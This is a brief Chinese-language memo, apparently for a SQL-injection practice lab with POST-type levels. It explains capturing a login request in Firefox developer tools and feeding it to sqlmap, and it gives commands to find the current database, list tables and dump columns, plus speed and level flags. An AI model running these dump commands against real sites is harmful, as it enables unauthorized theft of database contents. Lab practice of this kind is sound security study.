a到十一这些都是post型的可用sqlmap 粗暴的方式解题 用火狐打开 然后f12选择网络那个选项里头的有个post那项右键复制请求头
然后随便生成一个文本文档粘贴进去
再在网页那边随便输入用户名密码
再次复制 这次复制post数据像这样子的uname=aaa&passwd&submit=Submit//&这个符号要自己加
之后win+r cmd sqlmap.py -r “刚才那个文本文档的地址\mingzi.txt” –current-db –batch
爆出当前数据库 之后sqlmap.py -r “刚才那个文本文档的地址\mingzi.txt” -D 库名 –tables –batch
库名表明 爆表名字是需要 -C 表明 –dump 加上个dump
ps 如果觉得速度慢点话加个 –thread 10 有的关如果爆不出来提高level –level 2-5选一个